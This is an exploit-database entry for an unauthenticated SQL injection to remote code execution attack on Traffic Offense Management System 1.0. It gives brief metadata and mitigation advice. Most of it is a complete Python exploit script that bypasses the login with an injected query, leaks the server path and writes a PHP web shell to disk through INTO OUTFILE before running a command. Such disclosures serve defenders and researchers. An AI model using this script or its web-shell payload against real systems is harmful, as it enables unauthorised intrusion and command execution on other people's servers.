Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)

vendor:

Traffic Offense Management System

by:

Tagoletta (Tağmaç)

9,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Traffic Offense Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:traffic_offense_management_system:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2021

Traffic Offense Management System 1.0 – SQLi to Remote Code Execution (RCE) (Unauthenticated)

This exploit allows an unauthenticated attacker to execute arbitrary code on the vulnerable system by exploiting a SQL injection vulnerability in the Traffic Offense Management System 1.0. The attacker can bypass the authentication process by sending a crafted SQL query to the Login.php page. The attacker can then find the path of the vulnerable system and send a malicious payload to the server, which will be written to a file and executed.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, the application should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)
# Date: 19.08.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Linux

import requests
import random
import string
import json
from bs4 import BeautifulSoup

url = input("TARGET = ")

if not url.startswith('http://') and not url.startswith('https://'):
    url = "http://" + url
if not url.endswith('/'):
    url = url + "/"

payload= "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"

let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))


session = requests.session()

print("Login Bypass\n")

request_url = url + "/classes/Login.php?f=login"
post_data = {"username": "admin' or '1'='1'#", "password": ""}
bypassUser = session.post(request_url, data=post_data)
data = json.loads(bypassUser.text)
status = data["status"]
if status == "success":

    print("Finding first driver\n")

    getHTML = session.get(url + "admin/?page=drivers")
    getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
    findFirstDriverID = getHTMLParser.find("a", {"class": "delete_data"}).get("data-id")

    print("Found firs driver ID : " + findFirstDriverID)

    print("\nFinding path")

    findPath = session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+'\'')
    findPath = findPath.text[findPath.text.index("<b>Warning</b>:  ")+17:findPath.text.index("</b> on line ")]
    findPath = findPath[findPath.index("<b>")+3:len(findPath)]

    parser = findPath.split('\\')
    parser.pop()
    findPath = ""
    for find in parser:
        findPath += find + "/"

    print("\nFound Path : " + findPath)
    shellPath = findPath[findPath.index("admin/"):len(findPath)]

    SQLtoRCE = "' LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
    SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
    SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())

    print("\n\nShell Uploading...")
    session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+SQLtoRCE)

    print("\nShell Path : " + url+shellPath+shellname+".php")
    shellOutput = session.get(url+shellPath+shellname+".php?tago=whoami")
    print("\n\nShell Output : "+shellOutput.text)

else:
    print("No bypass user")